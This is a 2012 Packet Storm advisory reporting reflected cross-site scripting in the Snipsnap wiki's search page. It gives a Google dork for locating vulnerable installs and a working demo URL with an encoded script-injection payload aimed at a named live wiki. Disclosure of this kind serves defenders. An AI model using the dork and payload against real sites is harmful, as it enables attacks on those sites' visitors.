Snipsnap Cross Site Scripting

2012-02-08T00:00:00
ID PACKETSTORM:109543
Type packetstorm
Reporter Sony
Modified 2012-02-08T00:00:00

Description

                                        
                                            `# Exploit Title: Snipsnap "search" Cross Site Scripting  
# Date: 8.02.2012  
# Author: Sony  
# Software Link: http://snipsnap.org/space/start  
# Google Dorks: inurl:/space/start intext:snipsnap  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/02/snipsnap-cross-site-scripting.html  
..................................................................  
  
Well, we have xss in the "search". Yes, it's simple.  
  
Demo:  
  
http://wiki.xdroop.com/space/snipsnap-search?query=%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E  
  
http://4.bp.blogspot.com/-vzfx4bEs1I4/TzINaVumAcI/AAAAAAAAAbs/eLVfCPnnybc/s1600/snipsnap.JPG  
  
I don't like cross scripting in the search, because it's a very simple, but  
well..  
  
..................................................................  
  
InSecurity.Ro  
  
Because we care, we're security aware!  
`